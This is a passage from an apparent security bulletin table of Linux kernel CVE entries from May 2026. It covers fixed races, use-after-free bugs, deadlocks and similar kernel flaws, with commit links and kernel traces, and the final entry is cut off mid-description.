| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: revert commit_mutex usage in reset path It causes circular lock dependency between commit_mutex, nfnl_subsys_ipset and nlk_cb_mutex when nft reset, ipset list, and iptables-nft with '-m set' rule run at the same time. Previous patches made it safe to run individual reset handlers concurrently so commit_mutex is no longer required to prevent this. | 2026-05-27 | not yet calculated | CVE-2026-45901 | https://git.kernel.org/stable/c/ee3978b6a0dcd4215cb7cedcba705a12174786a7 https://git.kernel.org/stable/c/7f261bb906bf527c4a6e2a646e2d5f3679f2a8bc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: bq256xx: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. | 2026-05-27 | not yet calculated | CVE-2026-45902 | https://git.kernel.org/stable/c/81d3688c9a2158329391e08f2d0b8ba204216044 https://git.kernel.org/stable/c/74b5a88318db97d51bb40f774736553c2acd1514 https://git.kernel.org/stable/c/cb5c743936edcebc51880eeb6bf04979b5c9438b https://git.kernel.org/stable/c/83c27fdd696ac13d023ef7a0345301be93209c53 https://git.kernel.org/stable/c/4b6fb0b6124f558131e502e3ffd03e6583b3ace6 https://git.kernel.org/stable/c/8796910131a32ff29275052df768ef022929a394 https://git.kernel.org/stable/c/8005843369723d9c8975b7c4202d1b85d6125302 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix memory access flags in helper prototypes After commit 37cce22dbd51 ("bpf: verifier: Refactor helper access type tracking"), the verifier started relying on the access type flags in helper function prototypes to perform memory access optimizations. Currently, several helper functions utilizing ARG_PTR_TO_MEM lack the corresponding MEM_RDONLY or MEM_WRITE flags. This omission causes the verifier to incorrectly assume that the buffer contents are unchanged across the helper call. Consequently, the verifier may optimize away subsequent reads based on this wrong assumption, leading to correctness issues. For bpf_get_stack_proto_raw_tp, the original MEM_RDONLY was incorrect since the helper writes to the buffer. Change it to ARG_PTR_TO_UNINIT_MEM which correctly indicates write access to potentially uninitialized memory. Similar issues were recently addressed for specific helpers in commit ac44dcc788b9 ("bpf: Fix verifier assumptions of bpf_d_path's output buffer") and commit 2eb7648558a7 ("bpf: Specify access type of bpf_sysctl_get_name args"). Fix these prototypes by adding the correct memory access flags. | 2026-05-27 | not yet calculated | CVE-2026-45903 | https://git.kernel.org/stable/c/fdfe75161f6e8c41a7d3023fbb815b537107b806 https://git.kernel.org/stable/c/aa319592892068bd960c1a1c07bd621085b0c63d https://git.kernel.org/stable/c/802eef5afb1865bc5536a5302c068ba2215a1f72 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/eeh: fix recursive pci_lock_rescan_remove locking in EEH event handling The recent commit 1010b4c012b0 ("powerpc/eeh: Make EEH driver device hotplug safe") restructured the EEH driver to improve synchronization with the PCI hotplug layer. However, it inadvertently moved pci_lock_rescan_remove() outside its intended scope in eeh_handle_normal_event(), leading to broken PCI error reporting and improper EEH event triggering. Specifically, eeh_handle_normal_event() acquired pci_lock_rescan_remove() before calling eeh_pe_bus_get(), but eeh_pe_bus_get() itself attempts to acquire the same lock internally, causing nested locking and disrupting normal EEH event handling paths. This patch adds a boolean parameter do_lock to _eeh_pe_bus_get(), with two public wrappers: eeh_pe_bus_get() with locking enabled. eeh_pe_bus_get_nolock() that skips locking. Callers that already hold pci_lock_rescan_remove() now use eeh_pe_bus_get_nolock() to avoid recursive lock acquisition. Additionally, pci_lock_rescan_remove() calls are restored to the correct position-after eeh_pe_bus_get() and immediately before iterating affected PEs and devices. This ensures EEH-triggered PCI removes occur under proper bus rescan locking without recursive lock contention. The eeh_pe_loc_get() function has been split into two functions: eeh_pe_loc_get(struct eeh_pe *pe) which retrieves the loc for given PE. eeh_pe_loc_get_bus(struct pci_bus *bus) which retrieves the location code for given bus. This resolves lockdep warnings such as: <snip> [ 84.964298] [ T928] ============================================ [ 84.964304] [ T928] WARNING: possible recursive locking detected [ 84.964311] [ T928] 6.18.0-rc3 #51 Not tainted [ 84.964315] [ T928] -------------------------------------------- [ 84.964320] [ T928] eehd/928 is trying to acquire lock: [ 84.964324] [ T928] c000000003b29d58 (pci_rescan_remove_lock){+.+.}-{3:3}, at: pci_lock_rescan_remove+0x28/0x40 [ 84.964342] [ T928] but task is already holding lock: [ 84.964347] [ T928] c000000003b29d58 (pci_rescan_remove_lock){+.+.}-{3:3}, at: pci_lock_rescan_remove+0x28/0x40 [ 84.964357] [ T928] other info that might help us debug this: [ 84.964363] [ T928] Possible unsafe locking scenario: [ 84.964367] [ T928] CPU0 [ 84.964370] [ T928] ---- [ 84.964373] [ T928] lock(pci_rescan_remove_lock); [ 84.964378] [ T928] lock(pci_rescan_remove_lock); [ 84.964383] [ T928] *** DEADLOCK *** [ 84.964388] [ T928] May be due to missing lock nesting notation [ 84.964393] [ T928] 1 lock held by eehd/928: [ 84.964397] [ T928] #0: c000000003b29d58 (pci_rescan_remove_lock){+.+.}-{3:3}, at: pci_lock_rescan_remove+0x28/0x40 [ 84.964408] [ T928] stack backtrace: [ 84.964414] [ T928] CPU: 2 UID: 0 PID: 928 Comm: eehd Not tainted 6.18.0-rc3 #51 VOLUNTARY [ 84.964417] [ T928] Hardware name: IBM,9080-HEX POWER10 (architected) 0x800200 0xf000006 of:IBM,FW1060.00 (NH1060_022) hv:phyp pSeries [ 84.964419] [ T928] Call Trace: [ 84.964420] [ T928] [c0000011a7157990] [c000000001705de4] dump_stack_lvl+0xc8/0x130 (unreliable) [ 84.964424] [ T928] [c0000011a71579d0] [c0000000002f66e0] print_deadlock_bug+0x430/0x440 [ 84.964428] [ T928] [c0000011a7157a70] [c0000000002fd0c0] __lock_acquire+0x1530/0x2d80 [ 84.964431] [ T928] [c0000011a7157ba0] [c0000000002fea54] lock_acquire+0x144/0x410 [ 84.964433] [ T928] [c0000011a7157cb0] [c0000011a7157cb0] __mutex_lock+0xf4/0x1050 [ 84.964436] [ T928] [c0000011a7157e00] [c000000000de21d8] pci_lock_rescan_remove+0x28/0x40 [ 84.964439] [ T928] [c0000011a7157e20] [c00000000004ed98] eeh_pe_bus_get+0x48/0xc0 [ 84.964442] [ T928] [c0000011a7157e50] [c00000 ---truncated--- | 2026-05-27 | not yet calculated | CVE-2026-45904 | https://git.kernel.org/stable/c/89810e2d80281d42f855fac813786758ee16e323 https://git.kernel.org/stable/c/788dd28fd49610d6047cbb15dbf1186afffdfbaf https://git.kernel.org/stable/c/f49faa4a64f8ac0e38983e606075b25dfcfc9ad4 https://git.kernel.org/stable/c/87a1f93986aa1500b85aeff16b0b71c29ea116ea https://git.kernel.org/stable/c/f8b16d5764ee1e78c1ef333017ad383ffe76fcdc https://git.kernel.org/stable/c/6e6561231c6cfc32c5631aeecc0928ff2b14265c https://git.kernel.org/stable/c/b85ee287bfe52c6b2d9b41758b5e0d08679d5b39 https://git.kernel.org/stable/c/815a8d2feb5615ae7f0b5befd206af0b0160614c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: fix ip_rt_bug race in icmp_route_lookup reverse path icmp_route_lookup() performs multiple route lookups to find a suitable route for sending ICMP error messages, with special handling for XFRM (IPsec) policies. The lookup sequence is: 1. First, lookup output route for ICMP reply (dst = original src) 2. Pass through xfrm_lookup() for policy check 3. If blocked (-EPERM) or dst is not local, enter "reverse path" 4. In reverse path, call xfrm_decode_session_reverse() to get fl4_dec which reverses the original packet's flow (saddr<->daddr swapped) 5. If fl4_dec.saddr is local (we are the original destination), use __ip_route_output_key() for output route lookup 6. If fl4_dec.saddr is NOT local (we are a forwarding node), use ip_route_input() to simulate the reverse packet's input path 7. Finally, pass rt2 through xfrm_lookup() with XFRM_LOOKUP_ICMP flag The bug occurs in step 6: ip_route_input() is called with fl4_dec.daddr (original packet's source) as destination. If this address becomes local between the initial check and ip_route_input() call (e.g., due to concurrent "ip addr add"), ip_route_input() returns a LOCAL route with dst.output set to ip_rt_bug. This route is then used for ICMP output, causing dst_output() to call ip_rt_bug(), triggering a WARN_ON: ------------[ cut here ]------------ WARNING: net/ipv4/route.c:1275 at ip_rt_bug+0x21/0x30, CPU#1 Call Trace: <TASK> ip_push_pending_frames+0x202/0x240 icmp_push_reply+0x30d/0x430 __icmp_send+0x1149/0x24f0 ip_options_compile+0xa2/0xd0 ip_rcv_finish_core+0x829/0x1950 ip_rcv+0x2d7/0x420 __netif_receive_skb_one_core+0x185/0x1f0 netif_receive_skb+0x90/0x450 tun_get_user+0x3413/0x3fb0 tun_chr_write_iter+0xe4/0x220 ... Fix this by checking rt2->rt_type after ip_route_input(). If it's RTN_LOCAL, the route cannot be used for output, so treat it as an error. The reproducer requires kernel modification to widen the race window, making it unsuitable as a selftest. It is available at: https://gist.github.com/mrpre/eae853b72ac6a750f5d45d64ddac1e81 | 2026-05-27 | not yet calculated | CVE-2026-45905 | https://git.kernel.org/stable/c/9a95ec9144eeff1fc6fbcc21b677e322c6f1430b https://git.kernel.org/stable/c/2c1f59005da9dd4b07b26984fd719e36557dc57c https://git.kernel.org/stable/c/b04061f89ffc6168e7ec3c71d0086ec3c3797228 https://git.kernel.org/stable/c/1c9ef28f643cce34a6a6c36c8f4d6d60a60db7e1 https://git.kernel.org/stable/c/423ce12d10b426709489d6b84fdaa6d2f31c5652 https://git.kernel.org/stable/c/81b84de32bb27ae1ae2eb9acf0420e9d0d14bf00 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: pf1550: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. | 2026-05-27 | not yet calculated | CVE-2026-45906 | https://git.kernel.org/stable/c/1bdefeed904f1f17e1f73a4d8a035515f3a9fad8 https://git.kernel.org/stable/c/838767f5074700552d3f006d867caed65edc7328 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Fix deadlocks between devlink and netdev instance locks In the mentioned "Fixes" commit, various work tasks triggering devlink health reporter recovery were switched to use netdev_trylock to protect against concurrent tear down of the channels being recovered. But this had the side effect of introducing potential deadlocks because of incorrect lock ordering. The correct lock order is described by the init flow: probe_one -> mlx5_init_one (acquires devlink lock) -> mlx5_init_one_devl_locked -> mlx5_register_device -> mlx5_rescan_drivers_locked -...-> mlx5e_probe -> _mlx5e_probe -> register_netdev (acquires rtnl lock) -> register_netdevice (acquires netdev lock) => devlink lock -> rtnl lock -> netdev lock. But in the current recovery flow, the order is wrong: mlx5e_tx_err_cqe_work (acquires netdev lock) -> mlx5e_reporter_tx_err_cqe -> mlx5e_health_report -> devlink_health_report (acquires devlink lock => boom!) -> devlink_health_reporter_recover -> mlx5e_tx_reporter_recover -> mlx5e_tx_reporter_recover_from_ctx -> mlx5e_tx_reporter_err_cqe_recover The same pattern exists in: mlx5e_reporter_rx_timeout mlx5e_reporter_tx_ptpsq_unhealthy mlx5e_reporter_tx_timeout Fix these by moving the netdev_trylock calls from the work handlers lower in the call stack, in the respective recovery functions, where they are actually necessary. | 2026-05-27 | not yet calculated | CVE-2026-45907 | https://git.kernel.org/stable/c/4329514c61abefe4961541b128c549b017bab5ad https://git.kernel.org/stable/c/63f9d5fb4d8040077df801ca3270e2f02d55e0d9 https://git.kernel.org/stable/c/83ac0304a2d77519dae1e54c9713cbe1aedf19c9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/amdxdna: Fix memory leak in amdxdna_ubuf_map The amdxdna_ubuf_map() function allocates memory for sg and internal sg table structures, but it fails to free them if subsequent operations (sg_alloc_table_from_pages or dma_map_sgtable) fail. | 2026-05-27 | not yet calculated | CVE-2026-45908 | https://git.kernel.org/stable/c/5a68d2c99c859e6e8e36fa4e32749abf6d1fb66a https://git.kernel.org/stable/c/f9f4366d2ff93b07c2571561c776bd9a708078c3 https://git.kernel.org/stable/c/84dd57fb0359500092f1101409ca32091731490d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: cdns3: fix role switching during resume If the role change while we are suspended, the cdns3 driver switches to the new mode during resume. However, switching to host mode in this context causes a NULL pointer dereference. The host role's start() operation registers a xhci-hcd device, but its probe is deferred while we are in the resume path. The host role's resume() operation assumes the xhci-hcd device is already probed, which is not the case, leading to the dereference. Since the start() operation of the new role is already called, the resume operation can be skipped. So skip the resume operation for the new role if a role switch occurs during resume. Once the resume sequence is complete, the xhci-hcd device can be probed in case of host mode. Unable to handle kernel NULL pointer dereference at virtual address 0000000000000208 Mem abort info: ... Data abort info: ... [0000000000000208] pgd=0000000000000000, p4d=0000000000000000 Internal error: Oops: 0000000096000004 [#1] SMP Modules linked in: CPU: 0 UID: 0 PID: 146 Comm: sh Not tainted 6.19.0-rc7-00013-g6e64f4aabfae-dirty #135 PREEMPT Hardware name: Texas Instruments J7200 EVM (DT) pstate: 20000005 (nzCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : usb_hcd_is_primary_hcd+0x0/0x1c lr : cdns_host_resume+0x24/0x5c ... Call trace: usb_hcd_is_primary_hcd+0x0/0x1c (P) cdns_resume+0x6c/0xbc cdns3_controller_resume.isra.0+0xe8/0x17c cdns3_plat_resume+0x18/0x24 platform_pm_resume+0x2c/0x68 dpm_run_callback+0x90/0x248 device_resume+0x100/0x24c dpm_resume+0x190/0x2ec dpm_resume_end+0x18/0x34 suspend_devices_and_enter+0x2b0/0xa44 pm_suspend+0x16c/0x5fc state_store+0x80/0xec kobj_attr_store+0x18/0x2c sysfs_kf_write+0x7c/0x94 kernfs_fop_write_iter+0x130/0x1dc vfs_write+0x240/0x370 ksys_write+0x70/0x108 __arm64_sys_write+0x1c/0x28 invoke_syscall+0x48/0x10c el0_svc_common.constprop.0+0x40/0xe0 do_el0_svc+0x1c/0x28 el0_svc+0x34/0x108 el0t_64_sync_handler+0xa0/0xe4 el0t_64_sync+0x198/0x19c Code: 52800003 f9407ca5 d63f00a0 17ffffe4 (f9410401) ---[ end trace 0000000000000000 ]--- | 2026-05-27 | not yet calculated | CVE-2026-45911 | https://git.kernel.org/stable/c/ff02bd303d2d78051771db51119d66c0cf442f47 https://git.kernel.org/stable/c/94c742614899ff18a6b3e6f3cfbe7b9f36c865f3 https://git.kernel.org/stable/c/d637f6ec149ffd2f8257bcc261561dc2e44dbb8c https://git.kernel.org/stable/c/56289298431ed76700b9aac27a3b1d929fe61b8d https://git.kernel.org/stable/c/fc086c0ce3db0eefbbeb66a5b1e626296336e33a https://git.kernel.org/stable/c/49c99dc247ebf7361db9dbdade3dcebfffaf2c22 https://git.kernel.org/stable/c/87e4b043b98a1d269be0b812f383881abee0ca45 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: don't cache extent during splitting extent Caching extents during the splitting process is risky, as it may result in stale extents remaining in the status tree. Moreover, in most cases, the corresponding extent block entries are likely already cached before the split happens, making caching here not particularly useful. Assume we have an unwritten extent, and then DIO writes the first half. [UUUUUUUUUUUUUUUU] on-disk extent U: unwritten extent [UUUUUUUUUUUUUUUU] extent status tree |<- ->| ----> dio write this range First, when ext4_split_extent_at() splits this extent, it truncates the existing extent and then inserts a new one. During this process, this extent status entry may be shrunk, and calls to ext4_find_extent() and ext4_cache_extents() may occur, which could potentially insert the truncated range as a hole into the extent status tree. After the split is completed, this hole is not replaced with the correct status. [UUUUUUU|UUUUUUUU] on-disk extent U: unwritten extent [UUUUUUU|HHHHHHHH] extent status tree H: hole Then, the outer calling functions will not correct this remaining hole extent either. Finally, if we perform a delayed buffer write on this latter part, it will re-insert the delayed extent and cause an error in space accounting. In adition, if the unwritten extent cache is not shrunk during the splitting, ext4_cache_extents() also conflicts with existing extents when caching extents. In the future, we will add checks when caching extents, which will trigger a warning. Therefore, Do not cache extents that are being split. | 2026-05-27 | not yet calculated | CVE-2026-45912 | https://git.kernel.org/stable/c/8302b5b4aacdbb378f7b1216bb2ee782b5142415 https://git.kernel.org/stable/c/692103feca376ae4298c92aa8828015d20f1d87b https://git.kernel.org/stable/c/4c2d9dac4d328244f9365b0a1fa27ec802821820 https://git.kernel.org/stable/c/93b2ebbbcb2e63cfc21a1946dfe91d3aa7952036 https://git.kernel.org/stable/c/96007fd3c106aea773c1afae2d6f64cceb6da208 https://git.kernel.org/stable/c/5b1f4290453314e11cd8e15c7baa8a9b76c19b23 https://git.kernel.org/stable/c/9a2b95cdaf07785e2739199037bd9c0863ccc1be https://git.kernel.org/stable/c/8b4b19a2f96348d70bfa306ef7d4a13b0bcbea79 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: bridge: mcast: always update mdb_n_entries for vlan contexts syzbot triggered a warning[1] about the number of mdb entries in a context. It turned out that there are multiple ways to trigger that warning today (some got added during the years), the root cause of the problem is that the increase is done conditionally, and over the years these different conditions increased so there were new ways to trigger the warning, that is to do a decrease which wasn't paired with a previous increase. For example one way to trigger it is with flush: $ ip l add br0 up type bridge vlan_filtering 1 mcast_snooping 1 $ ip l add dumdum up master br0 type dummy $ bridge mdb add dev br0 port dumdum grp 239.0.0.1 permanent vid 1 $ ip link set dev br0 down $ ip link set dev br0 type bridge mcast_vlan_snooping 1 ^^^^ this will enable snooping, but will not update mdb_n_entries because in __br_multicast_enable_port_ctx() we check !netif_running $ bridge mdb flush dev br0 ^^^ this will trigger the warning because it will delete the pg which we added above, which will try to decrease mdb_n_entries Fix the problem by removing the conditional increase and always keep the count up-to-date while the vlan exists. In order to do that we have to first initialize it on port-vlan context creation, and then always increase or decrease the value regardless of mcast options. To keep the current behaviour we have to enforce the mdb limit only if the context is port's or if the port-vlan's mcast snooping is enabled. [1] ------------[ cut here ]------------ n == 0 WARNING: net/bridge/br_multicast.c:718 at br_multicast_port_ngroups_dec_one net/bridge/br_multicast.c:718 [inline], CPU#0: syz.4.4607/22043 WARNING: net/bridge/br_multicast.c:718 at br_multicast_port_ngroups_dec net/bridge/br_multicast.c:771 [inline], CPU#0: syz.4.4607/22043 WARNING: net/bridge/br_multicast.c:718 at br_multicast_del_pg+0x1bbe/0x1e20 net/bridge/br_multicast.c:825, CPU#0: syz.4.4607/22043 Modules linked in: CPU: 0 UID: 0 PID: 22043 Comm: syz.4.4607 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/24/2026 RIP: 0010:br_multicast_port_ngroups_dec_one net/bridge/br_multicast.c:718 [inline] RIP: 0010:br_multicast_port_ngroups_dec net/bridge/br_multicast.c:771 [inline] RIP: 0010:br_multicast_del_pg+0x1bbe/0x1e20 net/bridge/br_multicast.c:825 Code: 41 5f 5d e9 04 7a 48 f7 e8 3f 73 5c f7 90 0f 0b 90 e9 cf fd ff ff e8 31 73 5c f7 90 0f 0b 90 e9 16 fd ff ff e8 23 73 5c f7 90 <0f> 0b 90 e9 60 fd ff ff e8 15 73 5c f7 eb 05 e8 0e 73 5c f7 48 8b RSP: 0018:ffffc9000c207220 EFLAGS: 00010293 RAX: ffffffff8a68042d RBX: ffff88807c6f1800 RCX: ffff888066e90000 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 RBP: 0000000000000000 R08: ffff888066e90000 R09: 000000000000000c R10: 000000000000000c R11: 0000000000000000 R12: ffff8880303ef800 R13: dffffc0000000000 R14: ffff888050eb11c4 R15: 1ffff1100a1d6238 FS: 00007fa45921b6c0(0000) GS:ffff8881256f5000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fa4591f9ff8 CR3: 0000000081df2000 CR4: 00000000003526f0 Call Trace: <TASK> br_mdb_flush_pgs net/bridge/br_mdb.c:1525 [inline] br_mdb_flush net/bridge/br_mdb.c:1544 [inline] br_mdb_del_bulk+0x5e2/0xb20 net/bridge/br_mdb.c:1561 rtnl_mdb_del+0x48a/0x640 net/core/rtnetlink.c:-1 rtnetlink_rcv_msg+0x77e/0xbe0 net/core/rtnetlink.c:6967 netlink_rcv_skb+0x232/0x4b0 net/netlink/af_netlink.c:2550 netlink_unicast_kernel net/netlink/af_netlink.c:1318 [inline] netlink_unicast+0x80f/0x9b0 net/netlink/af_netlink.c:1344 netlink_sendmsg+0x813/0xb40 net/netlink/af_netlink.c:1894 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg net/socket.c:742 [inline] ____sys_sendmsg+0xa68/0xad0 net/socket.c:2592 ___sys_sendmsg+0x2a5/0x360 net/socke ---truncated--- | 2026-05-27 | not yet calculated | CVE-2026-45913 | https://git.kernel.org/stable/c/d0fdad1bdd21a358cc2c85da3681ae27b86ce6ce https://git.kernel.org/stable/c/724a405ce0309676f1e993c173382b4c4a022beb https://git.kernel.org/stable/c/fae260fc84e1eae8f590c7907e53e8768df2d986 https://git.kernel.org/stable/c/45525fdfd4cb612d7b414dd5cfa1f43892a7cd71 https://git.kernel.org/stable/c/8b769e311a86bb9d15c5658ad283b86fc8f080a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "hwmon: (ibmpex) fix use-after-free in high/low store" This reverts commit 6946c726c3f4c36f0f049e6f97e88c510b15f65d. Jean Delvare points out that the patch does not completely fix the reported problem, that it in fact introduces a (new) race condition, and that it may actually not be needed in the first place. Various AI reviews agree. Specific and relevant AI feedback: " This reordering sets the driver data to NULL before removing the sensor attributes in the loop below. ibmpex_show_sensor() retrieves this driver data via dev_get_drvdata() but does not check if it is NULL before dereferencing it to access data->sensors[]. If a userspace process reads a sensor file (like temp1_input) while this delete function is running, could it race with the dev_set_drvdata(..., NULL) call here and crash in ibmpex_show_sensor()? Would it be safer to keep the original order where device_remove_file() is called before clearing the driver data? device_remove_file() should wait for any active sysfs callbacks to complete, which might already prevent the use-after-free this patch intends to fix. " Revert the offending patch. If it can be shown that the originally reported alleged race condition does indeed exist, it can always be re-introduced with a complete fix. | 2026-05-27 | not yet calculated | CVE-2026-45914 | https://git.kernel.org/stable/c/05112ba67c824ab416cd54307c0b50aba9f0047a https://git.kernel.org/stable/c/efd68429f23fb4015b0ebc2392334059e06fad18 https://git.kernel.org/stable/c/f448acd86835a650f9ea83460b9ca347d3aafba5 https://git.kernel.org/stable/c/914b47c9b824d3d74f31c764163edf93302100b1 https://git.kernel.org/stable/c/14a38784e09aebc21207dc32fffa05247fc3dd64 https://git.kernel.org/stable/c/894d9c7aab68fd0c70c78b1d03c8fa589fb0f67d https://git.kernel.org/stable/c/8bde3e395a85017f12af2b0ba5c3684f5af9c006 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fat: avoid parent link count underflow in rmdir Corrupted FAT images can leave a directory inode with an incorrect i_nlink (e.g. 2 even though subdirectories exist). rmdir then unconditionally calls drop_nlink(dir) and can drive i_nlink to 0, triggering the WARN_ON in drop_nlink(). Add a sanity check in vfat_rmdir() and msdos_rmdir(): only drop the parent link count when it is at least 3, otherwise report a filesystem error. | 2026-05-27 | not yet calculated | CVE-2026-45915 | https://git.kernel.org/stable/c/7fe0de287e931e07cb96ecf1f449b2ebdb0e1115 https://git.kernel.org/stable/c/9894c79fd9466612d0514be157b5c30cd93aa645 https://git.kernel.org/stable/c/cd569b87378b9c33ae13c23d6bb9d205d66f7c4b https://git.kernel.org/stable/c/d3b7ffa90f613938128432c7b2f35b7aa4bdd86b https://git.kernel.org/stable/c/955c5d670b5ae07c78f4345e23a895638db96ce1 https://git.kernel.org/stable/c/17866f8a0822d414cb02e621cf003a7d04396ef8 https://git.kernel.org/stable/c/d0bb592fa9def2bace90ac8926c0a1d6fa8c1aa0 https://git.kernel.org/stable/c/8cafcb881364af5ef3a8b9fed4db254054033d8a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: sbs-battery: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. Keep the old behavior of just printing a warning in case of any failures during the IRQ request and finishing the probe successfully. | 2026-05-27 | not yet calculated | CVE-2026-45916 | https://git.kernel.org/stable/c/ca7dd71773e4e050b0fb98768b7eae60f8d1f38b https://git.kernel.org/stable/c/f1f472b14ad56104ba228b8fbec60d5b21829913 https://git.kernel.org/stable/c/8010b745b436c3e1ca5dd960aa29fa3e0f6d8841 https://git.kernel.org/stable/c/2078830c32d1e49ac942c6f8c21f35c806ae5e94 https://git.kernel.org/stable/c/82d3eb97a976c9d56bb92b241397610e57a9c629 https://git.kernel.org/stable/c/861dda7a9074c0ff67788928165ae39d7f647491 https://git.kernel.org/stable/c/14d4dee5d8fb361bfff275832087254beab66d72 https://git.kernel.org/stable/c/8d59cf3887fbabacef53bfba473e33e8a8d9d07b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipvs: do not keep dest_dst if dev is going down There is race between the netdev notifier ip_vs_dst_event() and the code that caches dst with dev that is going down. As the FIB can be notified for the closed device after our handler finishes, it is possible valid route to be returned and cached resuling in a leaked dev reference until the dest is not removed. To prevent new dest_dst to be attached to dest just after the handler dropped the old one, add a netif_running() check to make sure the notifier handler is not currently running for device that is closing. | 2026-05-27 | not yet calculated | CVE-2026-45917 | https://git.kernel.org/stable/c/64af43033503458c46023e56d6ae7bb0f824b55f https://git.kernel.org/stable/c/bae53b3baf2ff2f45f9205c438818fc055601a54 https://git.kernel.org/stable/c/024eb0bd19f507e6e7f0c7a7e5506d66b5dc1d3e https://git.kernel.org/stable/c/8fde939b0206afc1d5846217a01a16b9bc8c7896 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ovpn: tcp - don't deref NULL sk_socket member after tcp_close() When deleting a peer in case of keepalive expiration, the peer is removed from the OpenVPN hashtable and is temporary inserted in a "release list" for further processing. This happens in: ovpn_peer_keepalive_work() unlock_ovpn(release_list) This processing includes detaching from the socket being used to talk to this peer, by restoring its original proto and socket ops/callbacks. In case of TCP it may happen that, while the peer is sitting in the release list, userspace decides to close the socket. This will result in a concurrent execution of: tcp_close(sk) __tcp_close(sk) sock_orphan(sk) sk_set_socket(sk, NULL) The last function call will set sk->sk_socket to NULL. When the releasing routine is resumed, ovpn_tcp_socket_detach() will attempt to dereference sk->sk_socket to restore its original ops member. This operation will crash due to sk->sk_socket being NULL. Fix this race condition by testing-and-accessing sk->sk_socket atomically under sk->sk_callback_lock. | 2026-05-27 | not yet calculated | CVE-2026-45918 | https://git.kernel.org/stable/c/f998b2c4bec487063a586695159f9a1856e81c56 https://git.kernel.org/stable/c/b9142cf4e066c825ec68752a7dcaceda700bbe26 https://git.kernel.org/stable/c/94560267d6c41b1ff3fafbab726e3f8a55a6af34 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched/rt: Skip currently executing CPU in rto_next_cpu() CPU0 becomes overloaded when hosting a CPU-bound RT task, a non-CPU-bound RT task, and a CFS task stuck in kernel space. When other CPUs switch from RT to non-RT tasks, RT load balancing (LB) is triggered; with HAVE_RT_PUSH_IPI enabled, they send IPIs to CPU0 to drive the execution of rto_push_irq_work_func. During push_rt_task on CPU0, if next_task->prio < rq->donor->prio, resched_curr() sets NEED_RESCHED and after the push operation completes, CPU0 calls rto_next_cpu(). Since only CPU0 is overloaded in this scenario, rto_next_cpu() should ideally return -1 (no further IPI needed). However, multiple CPUs invoking tell_cpu_to_push() during LB increments rd->rto_loop_next. Even when rd->rto_cpu is set to -1, the mismatch between rd->rto_loop and rd->rto_loop_next forces rto_next_cpu() to restart its search from -1. With CPU0 remaining overloaded (satisfying rt_nr_migratory && rt_nr_total > 1), it gets reselected, causing CPU0 to queue irq_work to itself and send self-IPIs repeatedly. As long as CPU0 stays overloaded and other CPUs run pull_rt_tasks(), it falls into an infinite self-IPI loop, which triggers a CPU hardlockup due to continuous self-interrupts. The trigging scenario is as follows: cpu0 cpu1 cpu2 pull_rt_task tell_cpu_to_push <------------irq_work_queue_on rto_push_irq_work_func push_rt_task resched_curr(rq) pull_rt_task rto_next_cpu 